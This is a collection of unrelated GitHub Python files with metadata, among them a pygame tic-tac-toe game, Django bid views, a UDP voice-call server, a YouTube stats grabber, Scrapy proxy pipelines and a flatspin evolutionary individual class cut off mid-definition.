+{"seq_id":"10636718952","text":"import pygame\nfrom .logger import logger as log \nfrom .screens import MenuScreen, GameScreen\nfrom .tools import TextDisplayer\n\nclass Game:\n    \n    def __init__(self):\n        pygame.init()\n        pygame.display.set_caption(\"Morpion\")\n        self.DISPLAY_SIZE = (600, 600)\n        self.display = pygame.display.set_mode(self.DISPLAY_SIZE)\n        self.clock = pygame.time.Clock()\n        self.running = False\n        self.textDisplayer = TextDisplayer(self)\n\n        self.current_screen = \"main_screen\"\n\n        self.screens = {\n            \"main_screen\": MenuScreen(self),\n            \"game_screen\": GameScreen(self)\n        }\n\n        self.params = {\n            \"player1\": \"X\",\n            
\"player2\": \"O\",\n \"player1_name\": \"Player 1\",\n \"player2_name\": \"Player 2\",\n \"typePlayer1\": \"human\",\n \"typePlayer2\": \"human\",\n \"AI_method\": \"easy\" # easy, mimax, minimax_alpha_beta, complex\n }\n\n log.info(\"Game initialized\")\n\n\n \n def setScreen(self, screen_name):\n if screen_name in self.screens:\n self.current_screen = screen_name\n else:\n log.error(f\"Screen {screen_name} doesn't exist\")\n \n \n def run(self):\n self.running = True\n log.debug(\"funct Game.run() called\")\n \n\n while self.running:\n events = pygame.event.get()\n\n self.screens[self.current_screen].update(events)\n self.display.blit(self.screens[self.current_screen], (0,0))\n pygame.display.update()\n\n for event in events:\n if event.type == pygame.QUIT:\n log.info(\"Game closed\")\n self.running = False\n pygame.quit()\n","repo_name":"Sosso8305/TP-learn-AI-tic-tac-toe","sub_path":"morpion/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"2478199060","text":"import numpy as np\n\nclass Manager:\n def __init__(self):\n self.person_list = list()\n self.object_list = list()\n self.new_object_list = list()\n\n def add_person(self, _person):\n self.person_list.append(_person)\n\n def get_person(self, _index):\n for person in self.person_list:\n if person.id == _index:\n return person\n return None\n\n def get_object(self, _index):\n for obj in self.object_list:\n if obj.id == _index:\n return obj\n\n for new_obj in self.new_object_list:\n if new_obj.id == _index:\n return new_obj\n return None\n\n def add_object(self, _obj):\n self.new_object_list.append(_obj)\n\n def update(self):\n ## delete person\n for person in self.person_list:\n if person.is_deleted:\n for obj in person.belongings:\n self.object_list.remove(obj)\n self.person_list.remove(person)\n\n ## match objects to person\n if self.new_object_list:\n for _obj in self.new_object_list:\n if self.person_list:\n distance = float(\"inf\")\n target = None\n for person in self.person_list:\n if not person.is_missed:\n temp = calculate_distance(_obj, person)\n if temp < distance:\n distance = temp\n target = person\n if target:\n target.add_object(_obj)\n else:\n _obj.is_abandoned = True\n else:\n _obj.is_abandoned = True\n self.object_list.append(_obj)\n self.new_object_list=list()\n\n\n\n def get_ab_objects(self):\n ab_objects = [obj for obj in self.object_list if obj.is_abandoned]\n return ab_objects\n\n\ndef calculate_distance(_object, _person):\n obj_cen = np.array([(_object.location[0] + _object.location[2])/2, (_object.location[1] + _object.location[3])/2])\n per_cen = np.array([(_person.location[0] + _person.location[2])/2, (_person.location[1] + _person.location[3])/2])\n distance = np.sqrt(np.sum(np.square(obj_cen - per_cen)))\n return distance","repo_name":"jerry-ljy/Abandoned_Object_Detection","sub_path":"ab_detector/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"61"} +{"seq_id":"8892950599","text":"import logging\nimport os\nimport sys\nfrom functools import wraps\n\nimport streamlit as st # noqa: I201\nfrom kedro.config import ConfigLoader # noqa: I201,I100\nfrom kedro.framework.context import KedroContext\nfrom kedro.framework.hooks import _create_hook_manager\nfrom kedro.framework.startup import bootstrap_project\n\nlogger = logging.getLogger(__name__)\n\n\ndef 
get_project_dir() -> str:\n return st.session_state[\"kedro\"][\"config\"][\"project_dir\"]\n\n\ndef get_project_conf_dir() -> str:\n return st.session_state[\"kedro\"][\"config\"][\"project_conf_dir\"]\n\n\ndef get_package_name() -> str:\n return st.session_state[\"kedro\"][\"config\"][\"package_name\"]\n\n\ndef create_config(project_dir: str):\n if \"kedro\" in st.session_state:\n logger.warning(\"Kedro session already initiated and will be overwritten\")\n logger.info(f\"Kedro session initiated at {project_dir}\")\n st.session_state[\"kedro\"] = {}\n st.session_state[\"kedro\"][\"config\"] = {}\n st.session_state[\"kedro\"][\"config\"][\"project_dir\"] = project_dir\n st.session_state[\"kedro\"][\"config\"][\"project_conf_dir\"] = project_dir + \"/conf\"\n st.session_state[\"kedro\"][\"config\"][\"package_name\"] = \"pipelines\"\n st.session_state[\"kedro\"][\"pipelines\"] = {}\n\n\ndef bootstrap_kedro_project(project_dir: str | None = None, overwrite=False):\n if \"kedro\" in st.session_state and overwrite is False:\n logger.info(\"Kedro session already initiated\")\n return None\n if project_dir is None:\n project_dir = os.getcwd()\n logger.info(\"Project directory not provided, using current working directory\")\n logger.info(\"Initiating project at: %s\", project_dir)\n if project_dir not in sys.path:\n sys.path.append(project_dir)\n bootstrap_project(project_dir)\n create_config(project_dir)\n\n\ndef load_context():\n project_dir = get_project_dir()\n project_conf_dir = get_project_conf_dir()\n package_name = get_package_name()\n config_loader = ConfigLoader(conf_source=project_conf_dir)\n context = KedroContext(\n package_name=package_name,\n project_path=project_dir,\n config_loader=config_loader,\n hook_manager=_create_hook_manager(),\n )\n return context\n\n\ndef initiate_context():\n context = load_context()\n if \"catalog\" in st.session_state[\"kedro\"]:\n logger.info(\"Kedro catalog already initiated.\")\n else:\n st.session_state[\"kedro\"][\n \"catalog_counter\"\n ] = 0 # useful to force update cashed functions\n st.session_state[\"kedro\"][\"catalog\"] = context.catalog\n if \"parameters\" in st.session_state[\"kedro\"]:\n logger.info(\"Kedro parameters already initiated\")\n else:\n st.session_state[\"kedro\"][\n \"parameters_counter\"\n ] = 0 # useful to force update cashed functions\n st.session_state[\"kedro\"][\"parameters\"] = context.params\n\n\ndef start_kedro_session(project_dir: str | None = None):\n bootstrap_kedro_project(project_dir)\n initiate_context()\n\n\ndef reload_parameters():\n logger.info(\"Reloading Kedro parameters\")\n if \"parameters\" in st.session_state[\"kedro\"]:\n logger.warning(\"Kedro parameters already initiated and will be overwritten\")\n st.session_state[\"kedro\"][\n \"parameters_counter\"\n ] += 1 # useful to force update cashed functions\n context = load_context()\n st.session_state[\"kedro\"][\"parameters\"] = context.params\n\n\ndef reload_catalog():\n logger.info(\"Reloading Kedro parameters\")\n if \"catalog\" in st.session_state[\"kedro\"]:\n logger.warning(\"Kedro catalog already initiated and will be overwritten\")\n st.session_state[\"kedro\"][\n \"catalog_counter\"\n ] += 1 # useful to force update cashed functions\n context = load_context()\n st.session_state[\"kedro\"][\"catalog\"] = context.catalog\n\n\ndef reload_context():\n logger.info(\"Reloading Kedro context\")\n reload_parameters()\n 
reload_catalog()\n","repo_name":"WasteLabs/template_kedro_streamlit","sub_path":"src/dashboards/kedro_wrapper/context.py","file_name":"context.py","file_ext":"py","file_size_in_byte":3917,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"70965643074","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nfrom pygan.noisesampler.image_noise_sampler import ImageNoiseSampler\nfrom pydbm.cnn.featuregenerator.image_generator import ImageGenerator\nfrom pydbm.cnn.layerablecnn.convolution_layer import ConvolutionLayer\nfrom pydbm.synapse.cnn_graph import CNNGraph\nfrom pydbm.activation.tanh_function import TanhFunction\n\n\nclass ConvolveImageNoiseSampler(ImageNoiseSampler):\n '''\n Sampler which draws samples from the noise prior of images\n and has convolution operator to convolve sampled image data.\n\n This sampler will not learn as CNNs model\n but *condition* input noise.\n '''\n\n def __init__(\n self,\n batch_size,\n image_dir,\n seq_len=None,\n gray_scale_flag=True,\n wh_size_tuple=(100, 100),\n norm_mode=\"z_score\"\n ):\n '''\n Init.\n\n Args:\n training_image_dir: Dir path which stores image files for training.\n test_image_dir: Dir path which stores image files for test.\n seq_len: The length of one sequence.\n gray_scale_flag: Gray scale or not(RGB).\n wh_size_tuple: Tuple(`width`, `height`).\n norm_mode: How to normalize pixel values of images.\n - `z_score`: Z-Score normalization.\n - `min_max`: Min-max normalization.\n - `tanh`: Normalization by tanh function.\n\n '''\n super().__init__(\n batch_size=batch_size,\n image_dir=image_dir,\n seq_len=seq_len,\n gray_scale_flag=gray_scale_flag,\n wh_size_tuple=wh_size_tuple,\n norm_mode=norm_mode\n )\n\n if gray_scale_flag is True:\n channel = 1\n else:\n channel = 3\n\n self.__conv_layer = ConvolutionLayer(\n CNNGraph(\n activation_function=TanhFunction(),\n filter_num=batch_size,\n channel=channel,\n kernel_size=3,\n scale=0.1,\n stride=1,\n pad=1\n )\n )\n\n def generate(self):\n '''\n Draws samples from the `true` distribution.\n \n Returns:\n `np.ndarray` of samples.\n '''\n observed_arr = super().generate()\n return self.__conv_layer.convolve(observed_arr)\n\n def get_conv_layer(self):\n ''' getter '''\n return self.__conv_layer\n \n def set_conv_layer(self, value):\n ''' setter '''\n self.__conv_layer = value\n \n conv_layer = property(get_conv_layer, set_conv_layer)\n","repo_name":"Flipkickisreal/Hackathon2020Team3","sub_path":"library/accel-brain-code-master/accel-brain-code-master/Generative-Adversarial-Networks/pygan/noisesampler/imagenoisesampler/convolve_image_noise_sampler.py","file_name":"convolve_image_noise_sampler.py","file_ext":"py","file_size_in_byte":2783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3017444599","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def constructMaximumBinaryTree(self, nums: List[int]) -> TreeNode:\n \n if nums is None or len(nums) == 0:\n return None\n \n if len(nums) == 1:\n return TreeNode(nums[0])\n \n index = -1\n \n for i in range(len(nums)):\n if index == -1 or nums[i] > nums[index]:\n index = i\n \n node = TreeNode(nums[index])\n \n node.left = self.constructMaximumBinaryTree(nums[0:index])\n node.right = self.constructMaximumBinaryTree(nums[index + 1:])\n \n return 
node\n\n","repo_name":"lugy-bupt/algorithm","sub_path":"leet/0654-maximum-binary-tree/maximum-binary-tree.py","file_name":"maximum-binary-tree.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"29370236659","text":"import logging\nfrom ..funcutils import get_function_id\nimport dill as pickle\nfrom IPython import embed\n\nfrom ..utils import create_temp_dir\nfrom ..calltypes import Call, Return\nfrom typing import Dict, Tuple, List\nimport opcode\n\nlogger = logging.getLogger(__name__)\n\nfrom .base import BaseCache\n\nclass MemCache(BaseCache):\n def __init__(self):\n super().__init__()\n # this value is going to be used to help us keep track of a specific function, so we can join up a call and return object\n self._call_id_cache: Dict[Tuple, List] = {}\n\n def __getstate__(self):\n return self._cache\n\n def __setstate__(self, state):\n self._cache = state\n\n def __ensure_cache(self, func_id):\n if func_id not in self.cache:\n logger.debug(f\"Adding new function id mapping for {func_id}\")\n self._cache[func_id] = []\n\n def save(self, obj):\n '''\n Save a call/return object to the cache\n\n Args:\n obj (Call, Return): the call/return object to save to the cache\n \n Returns:\n None\n '''\n\n self.__ensure_cache(obj.id)\n logger.debug(f\"Inserting new item into cache from save: {obj}\")\n self._cache[obj.id].append(obj) \n\n def buffered_call_return_save(self, invocation_id, obj):\n '''\n Save a call/return object to the cache\n Items saved in this manner are going to be stored in a {'call': Call, 'return': Return} dict so you can see exactly what the return values are for each call\n Also, this method is nice because you can run it with multithreading or whatever concurrency, and it will be fine. The only time that things get added to the cache \n with this method is when both the call and return objects are present, so be conscious of that\n\n Args:\n invocation_id (str): a unique id to the particular invocation of a function. 
This value must be the same when the call and the return of the same function invocation are recorded\n            obj (Call, Return): the call/return object to save to the cache\n        \n        Returns:\n            None\n\n        Raises:\n            AssertionError\n        '''\n\n        if isinstance(obj, Call):\n            assert invocation_id not in self._call_id_cache, \"Got invocation_id collision!\"\n            logger.debug(f\"Adding new invocation id mapping for {invocation_id}\")\n            self._call_id_cache[invocation_id] = obj\n\n        elif isinstance(obj, Return): \n            assert invocation_id in self._call_id_cache, \"for some reason, we are trying to return from a function but we can't find the call object\"\n            self.__ensure_cache(obj.id)\n            item = {\n                'call': self._call_id_cache[invocation_id], \n                'return': obj\n            }\n            self._cache[obj.id].append(item)\n            logger.debug(f\"Inserting new item into cache: {item}\")\n            del self._call_id_cache[invocation_id] \n            logger.debug(f\"Deleting invocation id mapping for {invocation_id}\")\n\n\n    @property\n    def cache(self):\n        '''\n        Return the full cache\n\n        Returns:\n            dict: the full cache\n        '''\n        return self._cache\n    \n    \n    def get_cache_for_func(self, func_id):\n        '''\n        Given a function id (see get_function_id), return the cache for that function\n\n        Args:\n            func_id (str): the function id\n        \n        Returns:\n            list: the cache for the function\n        '''\n\n        return self._cache[func_id]\n    \n\n    def save_to_file(self, filename: str):\n        '''\n        Save the cache to a file\n\n        Args:\n            filename (str): the filename to save the cache to\n\n        Returns:\n            None\n        '''\n\n        with open(filename, 'wb') as f:\n            pickle.dump(self, f)","repo_name":"fuzzingai/callcache","sub_path":"callcache/cache/mem.py","file_name":"mem.py","file_ext":"py","file_size_in_byte":3860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"22802074422","text":"# Write to a file\r\n# 1. Open the file\r\nfp = open('f2.txt','w')\r\n\r\n# 2. Write a string to the file\r\n# A single string can be written to the file\r\n# fp.write(\"鲲之大,一锅炖不下,\")\r\na = ['hello\\n','world\\n','welcome to beijing\\n','毒死\\n']\r\n# Write a list of strings to the file\r\nfp.writelines(a)\r\n# 3. Close the file\r\nfp.close()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"zhenguo96/test1","sub_path":"Python基础笔记/15/代码/9.写文件.py","file_name":"9.写文件.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"25168421694","text":"from rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view, parser_classes\nfrom rest_framework.parsers import JSONParser\nfrom . serializers import PostPetBidSerializer, GetBidsOfPetPerOwnerSerlaizer\nfrom django.db import IntegrityError\nfrom . 
models import Pet\n\n\n'''\nNeed some permissions\n'''\n@api_view(['POST'])\n@parser_classes([JSONParser])\ndef user_bid_on_pet(request):\n try :\n bid_data_serializer = PostPetBidSerializer(data=request.data)\n if bid_data_serializer.is_valid():\n bid_data_serializer.save()\n return Response(bid_data_serializer.data, status=status.HTTP_201_CREATED)\n return Response(bid_data_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n except IntegrityError as e:\n return Response(str(e), status=status.HTTP_406_NOT_ACCEPTABLE)\n\n\n'''\nNeed some permissions\n'''\n@api_view(['GET'])\n@parser_classes([JSONParser])\ndef get_bids_of_pet_per_owner(request):\n try :\n id=request.data['pet_id']\n pet = Pet.objects.get(id=id)\n bids_data_serializer = GetBidsOfPetPerOwnerSerlaizer(pet, many=False)\n return Response(bids_data_serializer.data, status=status.HTTP_200_OK)\n \n except Pet.DoesNotExist:\n return Response(\"There is no bid for this pet\", status=status.HTTP_404_NOT_FOUND)\n except KeyError as e:\n return Response(\"Please provide a valid: \" + str(e), status=status.HTTP_400_BAD_REQUEST)","repo_name":"DevHwary/camList_task","sub_path":"petstore_project/bid_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7047701995","text":"import threading\r\nfrom socket import *\r\nfrom tkinter import INSERT, END\r\n\r\nimport pyaudio\r\n\r\n\r\ndef finalizaConexao(busy):\r\n try:\r\n if busy.flag['online']:\r\n servidorUdp.sendto(\"encerrar_ligacao\".encode(), origem_call)\r\n busy.flag['online'] = False\r\n except:\r\n pass\r\n\r\n\r\ndef iniciarServidorLigacao(meuIp, callback, endcallbtn, busy, console, connectbtn):\r\n global servidorUdp\r\n global origem_call\r\n global output_stream\r\n busy.flag['online'] = False\r\n HOST = meuIp\r\n PORT = 6000\r\n servidorUdp = socket(AF_INET, SOCK_DGRAM)\r\n origem = (HOST, PORT)\r\n servidorUdp.bind(origem)\r\n write(console, \"Iniciando servidor de ligação\")\r\n py_audio = pyaudio.PyAudio()\r\n buffer = 4096 # 127.0.0.1\r\n output_stream = py_audio.open(format=pyaudio.paInt16, output=True, rate=44100, channels=2, frames_per_buffer=buffer)\r\n while True:\r\n msg, origem_call = servidorUdp.recvfrom(4096)\r\n if \"convite\" in str(msg):\r\n if busy.flag['online']:\r\n servidorUdp.sendto(\"resposta_ao_convite/ocupado\".encode(), origem_call)\r\n else:\r\n split = str(msg).split('/')\r\n resp = callback(origem_call, split[1])\r\n if \"s\" in resp:\r\n write(console, \"Convite Aceito\")\r\n write(console, \"Começando ligação...\")\r\n output_stream = py_audio.open(format=pyaudio.paInt16, output=True, rate=44100, channels=2, frames_per_buffer=buffer)\r\n servidorUdp.sendto(\"resposta_ao_convite/aceito\".encode(), origem_call)\r\n busy.flag['online'] = True\r\n endcallbtn['state'] = \"active\"\r\n connectbtn['state'] = \"disabled\"\r\n thread2 = threading.Thread(target=enviarAudio, args=(busy,endcallbtn,console, connectbtn))\r\n thread2.start()\r\n elif \"n\" in resp:\r\n servidorUdp.sendto(\"resposta_ao_convite/rejeitado\".encode(), origem_call)\r\n elif \"encerrar_ligacao\" in str(msg):\r\n busy.flag['online'] = False\r\n endcallbtn['state'] = \"disabled\"\r\n connectbtn['state'] = \"active\"\r\n elif busy.flag['online']:\r\n output_stream.write(msg)\r\n\r\n\r\ndef enviarAudio(busy,endcallbtn,console,connectbtn):\r\n global py_audio\r\n global input_stream\r\n py_audio = pyaudio.PyAudio()\r\n buffer = 1024\r\n input_stream = 
py_audio.open(format=pyaudio.paInt16, input=True, rate=44100, channels=2, frames_per_buffer=buffer)\r\n while busy.flag['online']:\r\n data = input_stream.read(buffer)\r\n servidorUdp.sendto(data, origem_call)\r\n busy.flag['online'] = False\r\n endcallbtn['state'] = \"disabled\"\r\n connectbtn['state'] = \"active\"\r\n write(console, \"Ligacao finalizada\")\r\n input_stream.stop_stream()\r\n input_stream.close()\r\n output_stream.stop_stream()\r\n output_stream.close()\r\n py_audio.terminate()\r\n\r\ndef write(console, *message, end = \"\\n\", sep = \" \"):\r\n text = \"\"\r\n for item in message:\r\n text += \"{}\".format(item)\r\n text += sep\r\n text += end\r\n console.insert(INSERT, text)\r\n console.see(END)\r\n","repo_name":"bernardocerq/redes","sub_path":"REDES-final/serverLigacao.py","file_name":"serverLigacao.py","file_ext":"py","file_size_in_byte":3219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11822492408","text":"from googleapiclient.discovery import build\nimport config\nimport util\nimport argparse\nimport os\n\nyoutube = build('youtube', 'v3', developerKey=os.environ['API_KEY'])\n\n\ndef get_channel_videos(channel_id):\n \"\"\"Fetch the list of videos present under the channel id.\n \n :param channel_id: youtube channel id of the user\n :return : list of videos\n \n \"\"\"\n res = youtube.channels().list(id=channel_id,\n part='contentDetails').execute()\n playlist_id = res['items'][0]['contentDetails']['relatedPlaylists']['uploads']\n videos = []\n next_page_token = None\n\n while 1:\n res = youtube.playlistItems().list(playlistId=playlist_id,\n part='snippet',\n maxResults=50,\n pageToken=next_page_token).execute()\n videos += res['items']\n next_page_token = res.get('nextPageToken')\n\n if next_page_token is None:\n break\n\n return videos\n\n\ndef get_videos_stats(video_id):\n \"\"\"Fetch the statistics corresponding to the provided video id. 
\n \n :param video_id : youtube video id\n :return stats: statistics of video\n \"\"\"\n stats = []\n for i in range(0, len(video_id)):\n res = youtube.videos().list(id=video_id[i],\n part='statistics').execute()\n stats += res['items']\n\n return stats\n\n\ndef video_table(list_of_videos):\n \"\"\"Fetch the list of videos present under the channel id.\n \n :param channel_id: youtube channel id of the user\n :return : list of videos\n \"\"\"\n for video in list_of_videos:\n config.channel_id.append(video['snippet']['channelId'])\n config.channel_name.append(video['snippet']['channelTitle'])\n config.video_id.append(video['snippet']['resourceId']['videoId'])\n config.video_type.append(video['snippet']['resourceId']['kind'])\n config.video_title.append(video['snippet']['title'])\n config.video_description.append(video['snippet']['description'])\n config.publishedAt.append(video['snippet']['publishedAt'])\n\n\ndef stat_table(video_stats):\n \"\"\"Joins all the required columns.\n \n :param video_stats : list of videos \n :return : no value \n \"\"\"\n for stat in video_stats:\n if util.key_in_dict_and_not_none(stat['statistics'], \"viewCount\"):\n config.view_count.append(stat['statistics']['viewCount'])\n else:\n config.view_count.append(0)\n if util.key_in_dict_and_not_none(stat['statistics'], \"likeCount\"):\n config.like_count.append(stat['statistics']['likeCount'])\n else:\n config.like_count.append(0)\n if util.key_in_dict_and_not_none(stat['statistics'], \"dislikeCount\"):\n config.dislike_count.append(stat['statistics']['dislikeCount'])\n else:\n config.dislike_count.append(0)\n if util.key_in_dict_and_not_none(stat['statistics'], \"favoriteCount\"):\n config.favoriteCount.append(stat['statistics']['favoriteCount'])\n else:\n config.favoriteCount.append(0)\n if util.key_in_dict_and_not_none(stat['statistics'], \"commentCount\"):\n config.commentCount.append(stat['statistics']['commentCount'])\n else:\n config.commentCount.append(0)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n \"--output_dir\",\n type=str,\n )\n\n parser.add_argument(\n \"--channel_id\",\n type=str\n )\n\n args = parser.parse_args()\n\n list_of_videos = get_channel_videos(args.channel_id)\n video_table(list_of_videos)\n video_stats = get_videos_stats(config.video_id)\n stat_table(video_stats)\n util.write_output(zip(config.channel_id, config.channel_name,\n config.video_id, config.video_type, config.video_title,\n config.video_description, config.view_count, config.like_count,\n config.dislike_count, config.favoriteCount, config.commentCount,\n config.publishedAt),\n config.channel_name[0],\n args.output_dir)\n","repo_name":"Ravineesh/YouTubeGrabber","sub_path":"src/channel_stats.py","file_name":"channel_stats.py","file_ext":"py","file_size_in_byte":4248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74640010114","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\n\nimport pymongo\nfrom scrapy.exceptions import NotConfigured\n\n#保存fresh代理\nclass MongoFreshProxyPipeline(object):\n \n #fresh_proxy保存新代理,会自动过期\n collection_name = 'fresh_proxy'\n \n #fresh_proxy中元素过期时间(s)\n expire_time = 600\n\n def __init__(self, mongo_uri, mongo_db):\n self.mongo_uri = mongo_uri\n self.mongo_db = mongo_db\n \n @classmethod\n def from_crawler(cls, crawler):\n if not 
crawler.settings.getbool('MONGO_FRESHPROXY_PIPELINE_ENABLED'):\n # if this isn't specified in settings, the pipeline will be completely disabled\n raise NotConfigured\n return cls(\n mongo_uri=crawler.settings.get('MONGO_URI'),\n mongo_db=crawler.settings.get('MONGO_DATABASE', 'items')\n )\n\n def open_spider(self, spider):\n self.client = pymongo.MongoClient(self.mongo_uri)\n self.db = self.client[self.mongo_db]\n col = self.db[self.collection_name]\n col.create_index(\"createtime\",expireAfterSeconds=self.expire_time)\n\n\n def close_spider(self, spider):\n self.client.close()\n\n def process_item(self, item, spider):\n result = self.db[self.collection_name].find_one({'_id': item['_id']})\n if result:\n self.db[self.collection_name].replace_one({'_id': item['_id']}, item)\n else:\n self.db[self.collection_name].insert_one(item)\n return item\n\n#保存stable代理\nclass MongoStableProxyPipeline(object):\n \n #fresh_proxy保存新代理,会自动过期\n fresh_collection = 'fresh_proxy'\n stable_collection = 'stable_proxy'\n\n new_stable_proxies = []\n \n\n def __init__(self, mongo_uri, mongo_db):\n self.mongo_uri = mongo_uri\n self.mongo_db = mongo_db\n \n @classmethod\n def from_crawler(cls, crawler):\n if not crawler.settings.getbool('MONGO_STABLEPROXY_PIPELINE_ENABLED'):\n # if this isn't specified in settings, the pipeline will be completely disabled\n raise NotConfigured\n return cls(\n mongo_uri=crawler.settings.get('MONGO_URI'),\n mongo_db=crawler.settings.get('MONGO_DATABASE', 'items')\n )\n\n def open_spider(self, spider):\n self.client = pymongo.MongoClient(self.mongo_uri)\n self.db = self.client[self.mongo_db]\n spider.pipeline = self\n\n def close_spider(self, spider):\n #替换全部stable_collection的内容\n self.db[self.stable_collection].delete_many({})\n #去重\n seen_ids = set()\n new_proxies = []\n for p in self.new_stable_proxies:\n if p['_id'] not in seen_ids:\n new_proxies.append(p)\n seen_ids.add(p['_id'])\n print(new_proxies)\n self.db[self.stable_collection].insert_many(new_proxies)\n self.client.close()\n \n #返回 fresh/stable中的全部代理地址\n def listProxy(self):\n stable_proxies = self.db[self.stable_collection].find({})\n fresh_proxies = self.db[self.fresh_collection].find({})\n proxies = []\n for sp in stable_proxies:\n proxies.append(sp)\n for fp in fresh_proxies:\n proxies.append(fp)\n return proxies \n\n def process_item(self, item, spider):\n self.new_stable_proxies.append(item) \n return item \n","repo_name":"xianfengsong/freeProxy","sub_path":"freeProxy/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":3565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26574783218","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom itertools import count\nimport os\nimport sys\nimport logging\nfrom copy import deepcopy\n\nfrom flatspin.model import TileLatticeSpinIce\n\nfrom base_individual import Base_Individual\nimport fitness_functions\nimport evo_alg as ea\n\n\nclass Individual(Base_Individual):\n _id_counter = count(0)\n basis_min = 0.5\n basis_max = 1.1\n min_angle_offset = np.deg2rad(45)\n\n def __init__(self, *, lattice_shape=(10, 10), basis0_len=None, basis0_angle=None, basis1_len=None, basis1_angle=None, id=None, gen=0,\n angle_tile_map=None, angle_tile_shape=(3, 3), angle_tile_max_dim=None, angle_table=None, num_angles=None,\n hole_tile=None, hole_tile_shape=None, hole_tile_max_dim=None, min_holes=None, max_holes=None, parent_ids=None, min_magnets=None, **kwargs):\n self.gen = gen\n self._lattice_shape 
= lattice_shape\n self.min_magnets = min_magnets\n\n if parent_ids is None:\n self.parent_ids = []\n else:\n self.parent_ids = parent_ids\n\n self.id = next(self._id_counter) if id is None else id\n\n self.basis0_len = basis0_len if basis0_len is not None else random_range(Individual.basis_min, Individual.basis_max)\n self.basis0_angle = basis0_angle if basis0_angle is not None else random_range(0, np.pi)\n self.basis1_len = basis1_len if basis1_len is not None else random_range(Individual.basis_min, Individual.basis_max)\n self.basis1_angle = basis1_angle if basis1_angle is not None else random_range(Individual.min_angle_offset, np.pi - Individual.min_angle_offset)\n\n if angle_tile_map is not None:\n angle_tile_map = np.array(angle_tile_map) if not isinstance(angle_tile_map, np.ndarray) else angle_tile_map\n angle_tile_shape = angle_tile_map.shape\n else:\n if angle_tile_max_dim is not None:\n angle_tile_shape = (np.random.randint(1, angle_tile_max_dim + 1), np.random.randint(1, angle_tile_max_dim + 1))\n self.angle_tile_shape = angle_tile_shape\n self.angle_tile_max_dim = angle_tile_max_dim\n\n self.num_angles = num_angles\n self.angle_tile_map = angle_tile_map if angle_tile_map is not None else (\n np.random.randint(0, self.num_angles or np.prod(self.angle_tile_shape), size=self.angle_tile_shape)\n )\n\n self.angle_table = angle_table if angle_table is not None else random_range(0, 2 * np.pi, shape=(self.num_angles or np.prod(self.angle_tile_shape),))\n\n if hole_tile is not None:\n hole_tile = np.array(hole_tile) if not isinstance(hole_tile, np.ndarray) else hole_tile\n self.hole_tile_shape = hole_tile.shape\n self.hole_tile = hole_tile\n else:\n if hole_tile_max_dim is not None:\n hole_tile_shape = (np.random.randint(1, hole_tile_max_dim + 1), np.random.randint(1, hole_tile_max_dim + 1))\n self.hole_tile_shape = hole_tile_shape if hole_tile_shape is not None else self.angle_tile_shape\n self.hole_tile_max_dim = hole_tile_max_dim\n self._max_holes = max_holes\n\n self._min_holes = min_holes\n\n if hole_tile is None:\n num_holes = np.random.randint(self.min_holes, (self.max_holes) + 1)\n self.hole_tile = np.random.permutation(np.concatenate((np.zeros(num_holes), np.ones(np.prod(self.hole_tile_shape) - num_holes)))).reshape(self.hole_tile_shape)\n\n self.hole_tile = self.hole_tile.astype(int)\n self.fitness = None\n self.fitness_components = []\n self.fitness_info = []\n self._as_asi = None\n\n self.init_evolved_params(**kwargs)\n # assert self.num_magnets(self.lattice_shape) == len(self.angles), f\"Number of magnets ({self.num_magnets(self.lattice_shape)}) does not match number of angles ({len(self.angles)})\"\n\n def is_in_bounds(self, point):\n return 0 <= point[0] <= self.pheno_bounds[0] and 0 <= point[1] <= self.pheno_bounds[1]\n\n def plot(self, **kwargs):\n self.as_ASI.plot(**kwargs)\n\n def num_magnets(self, lattice_shape=None):\n if lattice_shape is None:\n lattice_shape = self._lattice_shape\n\n div = (lattice_shape[0] // self.hole_tile_shape[0], lattice_shape[1] // self.hole_tile_shape[1])\n remainder = (lattice_shape[0] % self.hole_tile_shape[0], lattice_shape[1] % self.hole_tile_shape[1])\n\n total = np.sum(self.hole_tile) * div[0] * div[1]\n total += np.sum(self.hole_tile[:remainder[0], :] * div[1])\n total += np.sum(self.hole_tile[:, :remainder[1]] * div[0])\n total += np.sum(self.hole_tile[:remainder[0], :remainder[1]])\n\n return total\n\n @property\n def lattice_shape(self):\n \"\"\"Returns the lattice shape, increasing it if necessary to satisfy the minimum number of 
